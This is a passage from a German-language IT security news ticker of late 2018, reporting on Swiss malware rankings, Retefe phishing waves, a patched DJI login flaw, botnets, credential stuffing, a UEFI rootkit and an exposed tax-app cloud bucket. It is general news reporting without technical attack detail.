2019 soll das System erweitert werden, wie es im Bericht heisst. Aktuell nutze es nur von der Kriminalpolizei aufgezeichnete Daten. Ab dem nächsten Jahr sollen auch Daten aus öffentlichen Quellen in die Analysen miteinfliessen. 
Es ist also noch ein weiter Weg bis zu den hellsehenden Mutanten aus Minority Report. Bis Polizisten vor der Tür stehen, noch bevor eine Straftat begangen wurde. Aber die Marschrichtung derartiger Entwicklungen ist klar. 
 

15.11.2018 - 17:52 Uhr

Diese Cyberbedrohungen terrorisieren aktuell Schweizer Unternehmen

Auch im Cyberraum wird die Schweiz mit Finanzen und Banken in Verbindung gebracht. Fast 13 Prozent der Schweizer Firmen kamen im Oktober mit Coinhive in Kontakt. Damit führt der Cryptominer die aktuelle "Most Wanted Malware"-Liste des israelischen Sicherheitsanbieters Check Point an. 

Cryptominer wie Coinhive zapfen die Rechenleistung ihrer Opfer an, um damit nach Kryptowährungen zu schürfen. Das Opfer zahlt die Stromkosten für einen Rechner, den es eventuell gar nicht nutzen kann und der Hacker verdient sich eine goldene Nase. Dahinter stecken Javaskripte, die sich leicht in Websites und Applikationen verbergen lassen – oder auch in der Werbung, die online eingeblendet wird.

Vergangenen Oktober zapften gleich zwei derartige Schädlinge im grossen Stil Unternehmensrechner an: Coinhive und Cryptoloot. Beide schürfen nach der Kryptowährung Monero. Die Bitcoin-Alternative ist besonders bei Cyberkriminellen sehr beliebt. Anders als mit Bitcoin können mit Monero etwa auch anonyme Zahlungen getätigt werden. 

Ein weiteres Highlight im Oktober: Nach langer Pause kehrte Conficker wieder zurück in die Top 10. Der uralte PC-Wurm war zuletzt im März gelistet. Conficker frisst sich bereits seit 2008 durch ungenügend geschützte IT-Systeme. 

Die Top Malware in der Schweiz im Oktober:

  1. Coinhive  (Cryptominer – 12,92 Prozent der Schweizer Firmen)
  2. Roughted (Malvertising – 5,54 Prozent der Schweizer Firmen)
  3. Cryptoloot  (Cryptominer – 3,52 Prozent der Schweizer Firmen)
  4. Conficker (Wurm – 3,19 Prozent der Schweizer Firmen)
  5. Jsecoin (Cryptominer – 2,85 Prozent der Schweizer Firmen)
  6. Ramnit (Wurm – 2,85 Prozent der Schweizer Firmen)
  7. Dorkbot (Wurm – 2,18 Prozent der Schweizer Firmen)
  8. Emotet (Trojaner – 2,01 Prozent der Schweizer Firmen)
  9. Lokibot (Trojaner – 1,85 Prozent der Schweizer Firmen)
  10. Nivdort (Trojaner – 1,85 Prozent der Schweizer Firmen)

15.11.2018 - 17:47 Uhr

Des Banking-Trojaners neue Kleider

Es scheint keine Woche zu vergehen, ohne eine neue Retefe-Welle. Der Banking-Trojaner war zwar eigentlich nie wirklich weg. In letzter Zeit scheint er aber einen stärkeren Appetit auf Zugangs- und Kontodaten zu haben. 

Das Schadprogramm wird in gross angelegten Spam-Kampagnen verbreitet. Derzeit nutzten die Drahtzieher dafür das Logo und den Namen des Eidgenössischen Departements für Verteidigung, Bevölkerungsschutz und Sport (VBS), um möglichst viele Opfer zu erwischen.

 

 

Wie die Melde- und Analysestelle Informationssicherung (Melani) auf Twitter warnt, sollen Betroffene diese E-Mails nicht öffnen. Stattdessen sollten sie den Vorfall direkt an reports(at)antiphishing(punkt)ch  melden.

Melani hat zudem eine Übersicht über die Aktivitäten von Retefe erstellt. Diese zeigt, dass es zwar nicht wirklich mehr Retefe-Kampagnen gibt. Die Internetkriminellen dahinter nutzen jedoch mehr unterschiedliche Unternehmen, um ihre Opfer zu ködern. 

(Source: GOVcert)

Die blauen Kreise zeigen an, wie viele Kampagnen pro Woche verschickt wurden. Die Logos auf der rechten Seite sind die Firmenauftritte und Organisationen, welche Retefe in der Zeit für die Kampagnen nutze. (Source: GOVcert)

Die vollständige Infografik sowie eine detaillierte Analyse zum Banking-Trojaner findet sich auf der Website des Swiss Government Computer Emergency Response Teams.

08.11.2018 - 15:00 Uhr

Sicherheitslücke macht DJIs Drohnen zu Wanzen

Wenn das laufende Jahr zu Ende ist, werden Privatnutzer und Unternehmen rund 9,3 Milliarden US-Dollar für Drohnen ausgegeben haben. Diese Zahl soll in den nächsten Jahren gemäss Marktforscher IDC mit einer durchschnittlichen jährlichen Wachstumsrate von 32,1 Prozent zulegen. Die Ausgaben von Unternehmen sollen mit einer Rate von 37,1 Prozent sogar noch etwas stärker wachsen.

Um diesem Markt gerecht zu werden stellte DJI, einer der führenden Drohnenhersteller im Consumer- und professionellen Umfeld, unlängst die Mavic 2 Enterprise vor. Eine Drohne mit modularem Zubehör, konzipiert für Infrastruktur-Inspektionen sowie Einsätzen bei der Brandbekämpfung oder der Strafverfolgung. Lesen Sie hier mehr zur DJI Mavic 2 Enterprise.
Was will jedoch sicher kein Nutzer, wenn so ein mehrere Tausend Franken teures Fluggerät gerade über den Köpfen anderer schwebt? Eine Sicherheitslücke! Doch genau das fanden die Sicherheitsexperten von Check Point, wie das israelische Unternehmen mitteilt.

Zugriff auf Flugdaten, Videos und Kamera
Die Schwachstelle ermöglicht es einem Angreifer zwar nicht, eine Drohne zu kapern. Doch sie ist genug ernst zu nehmen, dass DJI sie als «hohes Risiko» einstufte. Die Wahrscheinlichkeit, dass Cyberkriminelle sie finden, sei allerdings gering. Die Sicherheitslücke sitzt im Anmeldeprozess für DJI-Nutzer. Check Point zeigte auf, wie ein Angreifer potenziell einen Account übernehmen könnte. 

Auf diese Weise hätte der Cyberkriminelle Zugriff auf die Flug- und Nutzerdaten sowie auf die mit der Drohne gemachten Fotos und Videos. Der Angreifer könnte im Flug auch die Kamera der Drohne anzapfen oder den Flug auf der Karte verfolgen. Alles ohne das Mitwissen des Nutzers.

Der Angreifer müsste dafür lediglich einen DJI-Benutzer ködern, der das Onlineforum des Herstellers frequentiert. Der Anmeldeprozess verwendet Cookies, um die einzelnen Nutzer zu identifizieren. Über einen platzieren boshaften Link konnte Check Point in ihrem Versuch an diese Cookies herankommen und so die weiteren benötigten Tokens, Tickets und Zugangsdaten generieren, um sich erfolgreich als diesen Nutzer auszugeben. 

Lücke ist bereits gestopft

Check Point entdeckte das Problem bereits im März 2018 im Rahmen von DJIs Bug-Bounty-Programm. Der Hersteller behob die Sicherheitslücke anschliessend. Gemäss DJI und Check Point gebe es keine Hinweise darauf, dass die Schwachstelle ausgenutzt wurde. 

"Angesichts der Popularität von DJI-Drohnen ist es wichtig, dass potenziell kritische Schwachstellen wie diese schnell und effektiv behoben werden, und wir begrüssen es, dass DJI genau das getan hat", lässt sich Oded Vanunu, Head of Products Vulnerability Research bei Check Point, in der Mitteilung zitieren.

Hersteller und Sicherheitsanbieter empfehlen beide, Firmware und Apps stetig auf dem neuesten Stand zu halten. Mehr Infos zur DJI-Schwachstelle auf der Website von Check Point.

 

02.11.2018 - 16:58 Uhr

Und wieder machen SBB-Mails Schweizer Inboxen unsicher

Die Welle von Retefe-Angriffen auf Schweizer E-Mail-Posteingänge scheint nicht abzubrechen. Die Melde- und Analysestelle Informationssicherung (Melani) warnte auf Twitter in den vergangenen zwei Wochen gleich zweimal vor E-Mail-Kampagnen, die den Banking-Trojaner Retefe zu verbreiten versuchen.

 

 

Die schädlichen E-Mails nutzen jeweils Firmenauftritte und Logos bekannter Unternehmen und Organisationen, um möglichst viele Opfer hinters Licht zu führen. Die aktuellen Meldungen von Melani warnen vor E-Mails, die vorgeben von den SBB zu stammen. Zuvor hatte Melani auch schon vor gefälschten WEF- oder Zurich-Mails gewarnt.

Eines ist jedoch immer gleich: Die E-Mails verfügen über eine Word-Datei im Anhang. Wer diese öffnet, wird sogleich aufgefordert, Makros zu aktivieren. So versucht das Schadprogramm sich einen Weg in die Rechner seiner Opfer zu bahnen. Auf infizierten Systemen versucht Retefe anschliessend auf das Online-Banking der Betroffenen zuzugreifen.

 

 

Melani rät, die E-Mails nicht zu öffnen. Stattdessen sollten Betroffene sich reports(at)antiphishing(punkt)ch wenden.

Eine kleine Chronik:

  • Am 30. Oktober warnte Melani vor gefälschten SBB-Mails.
  • Am 23. Oktober warnte Melani vor gefälschten SBB-Mails.
  • Am 4. September warnte Melani vor gefälschten WEF-Mails.
  • Am 28. August warnte Melani vor gefälschten Zurich-Mails.
  • Am 21. August warnte Melani vor gefälschten Post-Mails.
  • Am 7. Juni warnte Melani vor gefälschten SBB-Mails.
  • Am 6. Juni warnte Melani vor gefälschten Mails der Eidgenössischen Steuerverwaltung.
     

02.11.2018 - 16:38 Uhr

Stuxnet regt sich wieder

Das berüchtigte Schadprogramm Stuxnet könnte wieder aufgetaucht sein. Wie Bleepingcomputer berichtet, soll eine Variante von Stuxnet kritische Infrastrukturen und strategische Netzwerke im Iran angegriffen haben. Es handle sich jedoch um eine aggressivere und fortschrittlichere Malware als diejenige, die vor einem Jahrzehnt zum Einsatz kam. Details zur erneuten Attacke sind jedoch noch spärlich. 

Stuxnet wurde spezifisch für Angriffe auf industrielle Überwachungssysteme von Siemens entwickelt. Beobachtet wurde der Computerwurm erstmals 2009. Unbekannte Angreifer nutzten ihn, um das iranische Atomprogramm zu stören. Wer dahintersteckte, ist noch nicht geklärt.

Es wäre nicht das erste Wiederaufleben von Stuxnet. Einige Jahre nach den Stuxnet-Attacken entdeckten Sicherheitsforscher Duqu, sozusagen der jüngere Bruder von Stuxnet. Die beiden Schädlinge wurden vermutlich von den gleichen Entwicklern kreiert. Anders als Stuxnet war Duqu jedoch mehr auf Spionage statt Sabotage ausgelegt.
 

02.11.2018 - 16:31 Uhr

Zum Nachschlagen:

Die Namen von Schadprogrammen decken ein breites Spektrum ab: von einschüchternd (wie etwa Olympic Destroyer) über kryptisch (Necurs) bis hin zu nerdy (Kirk). Das Who’s who der Malware gibt einen schnellen Überblick darüber, was hinter den Namen steckt. Die Liste wird laufend aktualisiert und ist unter www.it-markt.ch/MalwareABC zu finden.

02.11.2018 - 16:25 Uhr

Hacker erbeuten Pläne zu Atomanlagen

Die Fifa sorgt sich derzeit darum, welche sensiblen Daten nach dem Hackerangriff auf den Fussballverband wohl veröffentlicht werden. In Frankreich machen sich derzeit jedoch ganz andere Sorgen breit: Bei einem Hackerangriff erbeuteten Unbekannte 65 Gigabyte - 11'000 Dateien - vom Bauunternehmen Ingérop, wie Zeit unter Berufung auf NDR, Süddeutsche Zeitung und Le Monde berichtet.

Die gestohlenen Daten decken einen breiten Bereich ab: von persönlichen Informationen zu rund 1200 Mitarbeitern über Pläne, die zeigen wo sich die Kameras in einem Hochsicherheitsgefängnis befinden, bis hin zu Unterlagen über ein geplantes Atommüll-Endlager im Nordosten des Landes. 

Die Spur führt nach Deutschland. Ein Server in Dortmund bot im Juli die Daten des Ingérop-Hacks kurzfristig zum Download an. Der Server wurde vom Wissenschaftsladen Dortmund vermietet und von Ermittlern beschlagnahmt. Danach verschwanden die Daten grösstenteils wieder – bis sie unlängst im Darknet wieder auftauchten. 
 

22.10.2018 - 12:35 Uhr

Crypto-Miner und schädliche Werbung befallen immer mehr Schweizer Firmen

Jeden Monat listet der israelische Sicherheitsanbieter Check Point auf, welche Bedrohungen den Schweizer Unternehmen derzeit besonders zu schaffen machen. Diese "Most Wanted Malware"-Liste hat schon seit Monaten eine klare Nummer 1: den Crypto-Miner Coinhive.

Skripts wie Coinhive zapfen die Rechenleistung ihrer Opfer an, um damit nach Kryptowährungen zu schürfen. Sie lassen sich etwa in Websites einbetten. Wenn ein ahnungsloser Surfer auf die Website kommt, aktiviert sich das Skript. Die Anzahl Schweizer Unternehmen, die davon betroffen waren, stieg zwischen August und September um etwas mehr als einen Prozentpunkt auf 12,88 Prozent. 

Im Vergleich zum Vormonat machte jedoch vor allem Roughted einen grossen Sprung nach vorn. Die Malvertising-Kampagne verdoppelte ihren Anteil auf 4,65 Prozent und kletterte vom 5. auf den 2. Platz der Liste.

Roughted wird genutzt, um etwa bösartige Websites oder auch Schädlinge wie Adware, Exploit Kits und Ransomware zu verbreiten. Oft sind die Anzeigen nicht von regulärer Werbung zu unterscheiden. Die Cyberkriminellen, die dahinter stecken, fanden auch einen Weg, um Adblocker zu umgehen. 

Ebenfalls ganz oben mit dabei: Ramnit. Der mittlerweile schon in die Jahre gekommene Computerwurm lässt sich sein Alter nicht anmerken. Waren im August noch gerade mal 2,15 Prozent der Schweizer Firmen betroffen, waren es im September bereits 3,04 Prozent. Die ersten Ramnit-Infektionen gehen auf das Jahr 2010 zurück.

Die Top Malware in der Schweiz im September:

  • Coinhive  (Crypto Miner – 12.88 Prozent der Schweizer Firmen)
  • Roughted (Malvertising – 4,65 Prozent der Schweizer Firmen)
  • Cryptoloot  (Crypto Miner – 3,58 Prozent der Schweizer Firmen)
  • Ramnit (Wurm – 3,04 Prozent der Schweizer Firmen)
  • Jsecoin (Crypto Miner – 2,68 Prozent der Schweizer Firmen)
  • Lokibot (Trojaner - 2,33 Prozent der Schweizer Firmen)
  • Emotet (Trojaner – 2,15 Prozent der Schweizer Firmen)
  • Fireball (Adware – 1,61 Prozent der Schweizer Firmen)
  • Virut (Bot – 1,16 Prozent der Schweizer Firmen)
  • Dorkbot (Wurm – 1,43 Prozent der Schweizer Firmen)

22.10.2018 - 12:19 Uhr

Krake mit politischer Motivation sucht PCs zwecks Infektion

Wenn eine legitime Applikation verboten wird, wittern Cyberkriminelle bereits ein Geschäft. Sogar dann, wenn die Applikation nur potenziell verboten werden könnte, wie der Fall des Trojaners Octopus zeigt. Die Cyberkriminellen hinter der Schnüffler-Malware nutzten Berichte über ein bevorstehendes Verbot des Instant-Messaging-Diensts Telegram in Kasachstan aus. Der cloudbasierte Service mit russischen Wurzeln ist für Smartphones, Tablets und PCs erhältlich.

Die Cyberkriminellen verbreiteten eine Applikation, die sich als Telegram-Alternative für die oppositionellen Parteien des Landes ausgab. Der Launcher nutzte hierfür sogar das Logo einer der Parteien, wie Kaspersky Lab mitteilt. Die Applikation war jedoch nur ein Gefährt, um den Trojaner Octopus auf die PCs seiner ahnungslosen Opfer zu schleusen.

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Ein Beitrag geteilt von IT Security Blog (@itsecurityblog) am

 

Sobald der Trojaner aktiviert war, hatten die Cyberkriminellen aus der Ferne Zugriff auf die Rechner ihrer Opfer. Sie konnten etwa Dateien löschen, kopieren und stehlen sowie Systemeinstellungen verändern. Auf diese Weise war es ihnen möglich, ihre Opfer auszuspionieren und sensible Daten zu entwenden.

Gemäss den Sicherheitsexperten von Kaspersky könnte die Hackergruppe Dustsquad hinter den Angriffen stecken. Die russischsprachigen Cyberspione sind schon seit 2014 in den Ländern der ehemaligen Sowjetunion tätig. In den vergangenen zwei Jahren deckte Kaspersky nach eigenen Angaben vier ihrer Kampagnen auf. Dabei nutzte die Gruppe jeweils massgeschneiderte Android- und Windows-Malware um Privatpersonen und diplomatische Ziele anzugreifen.

11.10.2018 - 17:20 Uhr

So einfach lassen sich US-Waffensysteme hacken

Das Verteidigungsministerium der Vereinigten Staaten (DoD – engl. Department of Defense) investiert derzeit 1,66 Billionen US-Dollar in neue Waffensysteme. Grund genug, einmal genauer hinzuschauen. Das dachte sich wohl das Government Accountability Office – kurz GAO. Das Untersuchungsorgan wollte prüfen, wie sicher die Waffensysteme der USA vor Hackerangriffen sind. Das Resultat ist erschreckend.

Die Test-Hacker des GAO hatten enorm leichtes Spiel, wie aus dem Abschlussbericht (als PDF downloaden) hervorgeht. So konnten sie schon mit banalen Tools und Methoden die Kontrolle über ihre Ziele übernehmen oder diese abschalten. Dabei verwendeten sie Tools, die zum Teil kostenlos erhältlich sind für jeden, der Zugang zum Internet hat. 

Einem Team gelang es etwa, innert neun Sekunden das Admin-Passwort zu erraten. Vermutlich, weil der zuständige IT-Verantwortliche noch immer das Standardpasswort nutzte. Ein anderes Team legte ein System lahm, indem es das System lediglich scannte. Wieder ein anderes Team entwendete nebenbei rasch 100 Gigabyte an Daten.

Den IT-Verantwortlichen der angegriffenen Waffensysteme fiel das nicht mal auf – nicht mal, wenn die Angreifer bewusst auffällig agierten. Oft sei dies auf menschliches Versagen zurückzuführen. Ganze 41 Mal gaben Verantwortliche an, sie hätten keinen Grund gehabt, eine Cyberattacke zu vermuten. Denn Systemabstürze seien vollkommen normal für das System. 

11.10.2018 - 16:39 Uhr

Fast 1 Milliarde US-Dollar in Kryptowährungen gestohlen

Der Bitcoin-Kurs mag zwar weit unter seinem Rekordpreis liegen. Doch in einem bestimmten Kreis ist der Hype um Kryptowährungen ungebrochen: bei den Cyberkriminellen. Allein in den ersten neun Monaten des laufenden Jahres erbeuteten sie Kryptowährungen im Wert von insgesamt 927 Millionen US-Dollar, wie Reuters berichtet. Die Nachrichtenagentur beruft sich dabei auf eine Studie der US-amerikanischen IT-Security-Firma Ciphertrace.  

Eine dramatische Steigerung: Im Vergleich zum Vorjahr steigerte sich dieser Wert um fast 250 Prozent. Im Vorjahr raubten Cyberkriminelle gerademal 266 Millionen Dollar, indem sie Tauschbörsen hackten. Wie aus der Studie hervorgeht, nahmen vor allem auch kleine Diebstähle zu, bei denen es um Beträge von 20 bis 60 Dollar geht. 

Gemäss den Studienautoren dürfte es aber noch eine sehr grosse Dunkelziffer geben. Ciphertrace schätzt, dass sie nur rund zwei Drittel der kriminellen Transaktionen in ihrer Studie erfassten. So wisse das Unternehmen etwa von einem Raub, bei dem Unbekannte 60 Millionen Dollar stahlen. Dieser Diebstahl wurde jedoch nie gemeldet. 

In Ländern mit laschen Gesetzen gegen Geldwäscherei würden die populären Tauschbörsen im grossen Stil dafür genutzt. Laut der Studie wurden seit 2009 bereits 2,5 Milliarden Dollar über Bitcoin-Tauschbörsen gewaschen. 
 

11.10.2018 - 15:19 Uhr

Zum Nachschlagen: Das Who's who der Malware

Die Namen von Schadprogrammen decken ein breites Spektrum ab - von einschüchternd (wie etwa Olympic Destroyer) über kryptisch (Necurs) bis hin zu nerdy (Kirk). Das Who’s who der Malware gibt einen schnellen Überblick darüber,  was hinter diesen Namen steckt.

Mehr auf www.it-markt.ch/MalwareABC

28.09.2018 - 18:10 Uhr

UEFI-Malware verhakt sich in den Eingeweiden von PCs

Ein Schädling auf dem Rechner zu haben, kann sehr mühsam sein. Doch in der Regel gibt es einiges, das man dagegen tun kann. Manchmal hilft schon eine Anti-Virus-Lösung, um das Schadprogramm zu beseitigen. Wenn es heftiger wird, muss man auch mal das Betriebssystem neu aufsetzen oder eine Festplatte ersetzen. 

Doch es gibt eine Gruppe von Schädlingen, die noch tiefer im System stecken und daher keine dieser Massnahmen fürchten. Diese Bedrohungen sitzen in der zentralen Schnittstelle zwischen der Firmware und dem Betriebssystem. 

BIOS-Rootkits sind nichts Neues. Dabei handelt es sich um Sammlungen von Softwaretools, die dem Angreifer unbemerkt Kontrolle über einen Rechner ermöglichen. Rootkits für den BIOS-Nachfolger UEFI (vor allem in 64-Bit-Systemen Standard) gab es bislang nur in Form von Machbarkeitsnachweisen. 

Die Sicherheitsforscher von Eset haben nun jedoch beobachtet, wie Cyberkriminelle just solche Tools einsetzen. Dabei handelt es sich um die berüchtigte Sednit-Gruppe. Die Gruppe ist gemäss Eset bereits seit 2004 aktiv und für einige hochkarätige Angriffe verantwortlich – darunter der Hack des Democratic National Committee kurz vor der Präsidentschaftswahl in den Vereinigten Staaten 2016. 

Eset nannte das Rootkit Lojax. Eine reale und ernstzunehmende Gefahr. Schliesslich seien derartige Bedrohungen sehr schwierig zu erkennen und noch schwieriger zu beseitigen. Den vollständigen Bericht zu Lojax können Interessierte hier einsehen (PDF-Download).

Der Baarer Dienstleister Infoguard reagierte jedoch sogleich mit einem eigenen Blogeintrag. Spätestens nach der Aktivierung verhalte sich Lojax wie Malware. Altbewährte Techniken, um nach Schadprogrammen zu jagen, würden also auch hier funktionieren. 

 

28.09.2018 - 17:44 Uhr

Pentagon sucht nach Jedi – aber auf die altmodische Art

Das Pentagon, der Hauptsitz des US-amerikanischen Verteidigungsministeriums, ist auf der Suche nach JEDI. Kapuzen tragende Lichtschwertschwinger, die über tausend Generationen lang in der Alten Republik die Hüter des Friedens und der Gerechtigkeit waren, bevor es dunkel wurde in der Welt - bevor das Imperium aufkam? Nein, das sind nicht die Jedi, die das Pentagon sucht.

JEDI ist keine Anspielung auf die Star-Wars-Filmreihe, sondern die Abkürzung für Joint Enterprise Defense Infrastructure. Eine Cloud-Plattform, die das Pentagon derzeit aufbauen will. Sie soll das Verteidigungsministerium der Vereinigten Staaten modernisieren. 

Der Auftraggeber, das Pentagon, passte nun die Ausschreibungsunterlagen an, wie The Register berichtet. Unternehmen, die ihr Konzept für das hochmoderne und hochsichere Cloud-System einreichen wollen, müssen dafür auf ein altmodisches Medium zurückgreifen: DVDs.

"An Stelle von elektronischen Einreichungen müssen Bieter ihre komplette Offerte auf eine DVD speichern und persönlich überbringen", heisst es in den Richtlinien. Andere Einreichungen werden nicht akzeptiert. 

Es ist jedoch höchst fraglich, ob ein paar DVDs ausreichen. Schliesslich geht es hier um ein Projekt von 10 Milliarden US-Dollar, das den Auftragnehmer noch eine Dekade beschäftigen wird und den grössten Teil der IT-Prozesse des US- Verteidigungsministeriums übernehmen soll. Wer auch immer die Einreichungen prüft, wird sich wohl durch ganze Berge von DVDs wühlen müssen.

28.09.2018 - 17:16 Uhr

Riesiges IoT-Botnetz entdeckt – Zweck ungewiss

Sicherheitsforscher von Avast haben ein neues Botnetz entdeckt, das sich in den vernetzten Geräten des Internets der Dinge (Internet of Things -IoT) ausbreitet. Das Netz ist vergleichbar mit Mirai, doch spiele es in einer ganz anderen Liga, berichtet Bleepingcomputer. Der Name dieser neuen Bedrohung ist Torii.

Das Schadprogramm, das Geräte infiziert und sie an das Botnetz bindet, hat es in sich. Gemäss dem Bericht wurde es für möglichst heimliche und langanhaltende Operationen entwickelt. Zudem könne es eine sehr breite Palette an IoT-Geräten infizierten. Torii soll gemäss einem Blog-Eintrag von Avast mehr Geräte befallen können als irgendeine andere Botnetz-Malware zuvor. 

Die verschlüsselte Verbindung zum Command-and-Control-Server läuft über das Tor-Netzwerk. Die Attacke selbst kommt jedoch über den Port 23 – den Telnet-Port. Geräte, die diesen Port offenlassen oder nur schwach schützen, sind für Torii gefundenes Fressen.

IoT-Botnetze werden in der Regel für massive DDoS-Attacken genutzt. Die Angriffbandbreiten der Mirai-Attacken brachen damals sämtliche Rekorde (Lesen Sie mehr zu den DDoS-Rekorden hier). Torii mache jedoch keine Anstalten in diese Richtung. Jedenfalls noch nicht. 

Dem Angreifer stehen jedoch viele Möglichkeiten offen. Das Schadprogramm kann auf den infizierten Geräten nämlich beliebigen Code ausführen. Denkbar wäre etwa auch, dass die Cyberkriminellen die Rechenleistung nutzen wollen, um nach Kryptowährungen zu schürfen. 
 

28.09.2018 - 16:40 Uhr

Steigende Krankenkassenprämien – steigende Spam-Aktivität

Die Melde- und Analysestelle Informationssicherung (Melani) hat schon wieder eine Warnung vor dem E-Banking-Trojaner Retefe veröffentlicht. Das Schadprogramm wird durch grossangelegte Spam-Kampagnen verbreitet. Um möglichst viele Opfer zu infizieren, ändern die Cyberkriminellen regelmässig das Aussehen dieser Spam-Mails. 

Die aktuelle Kampagne kopiert das Design der Helsana. Wie es auf Twitter heisst, versuchen die Cyberkriminellen die aktuelle Diskussion um steigende Krankenkassenprämien für ihre Zwecke auszunutzen.  

 

 

Der Anhang der E-Mail enthalte angeblich nähere Informationen zu den geänderten Sparbeiträgen. Die angehängte .doc-Datei ist jedoch nur eine Täuschung, um die Malware Retefe auf den Rechner des Opfers zu bringen. Melani empfiehlt, diese E-Mails sofort zu löschen und sie gar nicht erst zu öffnen.

Retefe wird in jüngster Vergangenheit wieder sehr aggressiv verbreitet. So ist dies nur eine von vielen Warnungen, die Melani diesbezüglich ausgesprochen hat:

  • Am 4. September warnte Melani vor gefälschten WEF-Mails.
  • Am 28. August warnte Melani vor gefälschten Zurich-Mails.
  • Am 21. August warnte Melani vor gefälschten Post-Mails.
  • Am 7. Juni warnte Melani vor gefälschten SBB-Mails.
  • Am 6. Juni warnte Melani vor gefälschten Mails der Eidgenössischen Steuerverwaltung.

21.09.2018 - 16:00 Uhr

Akamai: Botnetze verstopfen Log-in-Formulare – auch in der Schweiz

Botnetze werden in der Regel mit DDoS-Attacken assoziiert. Derartige Attacken können Websites regelrecht vom Netz fegen. Botnetze können aber auch anders, wie Akamai in seinem aktuellen State of the Internet Security Report zeigt. Die aktuelle Ausgabe der IT-Security-Studie widmet sich nämlich dem Thema Credential Stuffing Attacks. 

Genau wie eine DDOS-Attacke nutzt auch Credential Stuffing die schiere Masse eines Botnetzes zu ihrem Vorteil aus. Während eine DDoS-Attacke versucht, mit möglichst vielen gleichzeitigen Seitenaufrufen die Infrastruktur des Betreibers zu überlasten, hat Credential Stuffing es auf Zugangsdaten abgesehen. 

Manchmal laut, manchmal heimlich

Mit einer Credential-Stuffing-Attacke versuchen Cyberkriminelle herauszufinden, wer die gleichen Passwörter für verschiedene Onlinedienste nutzt. Dazu füttern sie Botnetze mit Datenbanken voller gestohlenen Zugangsdaten. Die Botnetze klappern anschliessend das Internet ab und versuchen, sich mit den Passwörtern und Benutzernamen irgendwo einzuloggen. Ziel solcher Attacken sind vor allem E-Banking- und Onlineshopping-Seiten. 

Manchmal seien die Attacken laut und dreist und zielen mehr auf Volumen ab. In anderen Fällen würden die Kriminellen sich zurückhalten und klammheimlich langsame und leise Angriffe ausführen. Viele Botnetze würden versuchen, so lange wie möglich unter dem Radar zu fliegen. So können sie möglichst lange versuchen, ausnutzbare Zugangsdaten zu finden.

8,3 Milliarden Attacken in 8 Monaten

Wie Akamai in seinem Bericht schreibt, nehmen Credential-Stuffing-Attacken stark zu. Von Januar bis April 2018 registrierte das Unternehmen rund 3,2 Milliarden solcher betrügerischen Log-in-Versuche. In den Monaten Mai und Juni allein stieg die Anzahl bereits auf über 8,3 Milliarden. Der monatliche Durchschnittswert stieg gemäss Akamai um 30 Prozent.

Insgesamt gab es laut dem Bericht zwischen November 2017 und Juni 2018 mehr als 30 Milliarden Log-ins, die auf Credential Stuffing zurückzuführen sind. Wie Akamai in einer anderen Studie schrieb ((Ponemon Report, Oktober 2017), können durch solche Attacken Kosten von bis zu mehreren zehn Millionen US-Dollar pro Jahr entstehen für die betroffenen Unternehmen. 

"Unsere Nachforschungen zeigen, dass die Drahtzieher solcher Credential-Stuffing-Attacken ihre Methoden und ihr Arsenal konstant weiterentwickeln", sagt Martin McKeay, Senior Security Advocate bei Akamai und Hauptautor des State of the Internet Security Report.

Die meisten Attacken – mit einem signifikanten Abstand – waren auf Ziele in den USA gerichtet. Die Studienautoren führen dies auf drei Gründe zurück:

  • die hohe Anzahl an Unternehmen, deren Log-in-Seiten von US-amerikanischen Unternehmen betrieben werden,
  • Akamais Kundenstamm (Das Unternehmen hat seinen Hauptsitz in Massachusetts, USA),
  • und dass Datenabflüsse bis vor Kurzem noch primär US-amerikanische Unternehmen betrafen. 

Abwehr auf Kosten der Benutzerfreundlichkeit

Die Basis jeder Credential-Stuffing-Attacke sind die gestohlenen Datensätze mit den Zugangsinformationen. Zwar wird der Diebstahl von Log-in-Daten zunehmend zu einem weltweiten Problem. Aber sogar noch im Jahr 2016 hatten 9 von 10 Hackerangriffe mit der Absicht, Zugangsdaten zu stehlen, Firmen in den USA im Visier, wie Akamai aus einer Symantec-Studie zitiert. 

Akamai sieht noch eine weitere Auffälligkeit bei der geographischen Verteilung. Sie unterscheidet sich sehr stark von den anderen Angriffsmethoden. So sei es etwa unüblich, dass Länder wie die Schweiz, Kanada oder Schweden in den Top 10 auftauchen. Bei Credential Stuffing sei dies aber der Fall. 

Es gibt zwar Wege, sich gegen derartige Attacken zu schützen. Wie Akamai schreibt, gingen solche Attacken allerdings auf Kosten der Benutzerfreundlichkeit.

19.09.2018 - 17:18 Uhr

CEO-Betrüger versetzt Aargauer in Schrecken

Der Kantonspolizei Aargau sind mehrere Fälle von E-Mail-Betrugsversuchen zu Ohren gekommen. Es handelt sich dabei um einen CEO Scam, wie der Mitteilung zu entnehmen ist. Der Kriminelle gibt sich dabei in den E-Mails als Vorgesetzter des Opfers aus.

In den aktuellen Fällen forderte der Betrüger seine Opfer auf, Geldbeträge ins Ausland zu überweisen. Die Betrugs-Mails gingen an diverse Adressaten in verschiedenen Regionen der Schweiz - mehrheitlich an Vereine, wie die Kapo Aargau schreibt.

In wie vielen Fällen die Opfer tatsächlich gezahlt hätten, sei noch nicht bekannt. Wer eine Zahlung ausgeführt hat, soll umgehend Anzeige erstatten. Die Polizei mahnt zur Vorsicht: In solchen Fällen sei es ratsam, den Vorgesetzten direkt zu kontaktieren.

19.09.2018 - 17:16 Uhr

Zürcher Steuer-App Steuern59 teilt sensible Kundendaten mit der ganzen Welt

Jeder hat sein Smartphone fast immer zur Hand. Daher ist es naheliegend, dass immer mehr Dienste über das Handy erledigt werden. Lichter einschalten, Ofen vorwärmen oder auch die Steuererklärung ausfüllen.

Mobile Security steckt jedoch noch in den Kinderschuhen oder wird zuweilen ganz vergessen. Deutlich macht dies das jüngste Beispiel der Schweizer Steuerberatungsfirma Zürich Financial Solutions (Zufiso), wie Heise berichtet.

Zufiso bietet eine App an, mit der Nutzer für 59 Franken ihre Steuererklärung ausfüllen können. Diese nennt sich Steuern59 und ist für Android und iOS erhältlich. Wie der Sicherheitsforscher Secuninja entdeckte, speichert die App sensible Nutzerdaten in der AWS-Cloud. Jeder, der ein kostenloses AWS-Konto besitzt, konnte auf die Daten zugreifen. Alternativ kann man auch kostenlose Tools verwenden, welche die Amazon Cloud nach derartigen verwundbaren AWS-Buckets durchsucht.

Was genau fand der Sicherheitsforscher? Sämtliche in der App erhobenen Daten und alle mit dem Handy fotografierten Dokumente. Also die Steuererklärungen, die Steuerbescheide, Belege wie Lohnabrechnungen, Versicherungsnachweise sowie Geburts- und Heiratsurkunden.

Passwörter und Fotos der Entwickler in der Cloud

